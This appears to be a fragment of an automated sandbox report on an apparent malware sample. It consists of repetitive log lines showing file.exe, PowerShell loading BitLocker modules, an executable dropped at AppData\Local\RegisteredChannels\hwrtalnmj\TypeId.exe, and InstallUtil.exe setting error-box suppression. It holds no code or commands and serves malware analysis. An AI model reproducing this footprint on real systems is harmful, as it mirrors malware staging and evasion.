                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
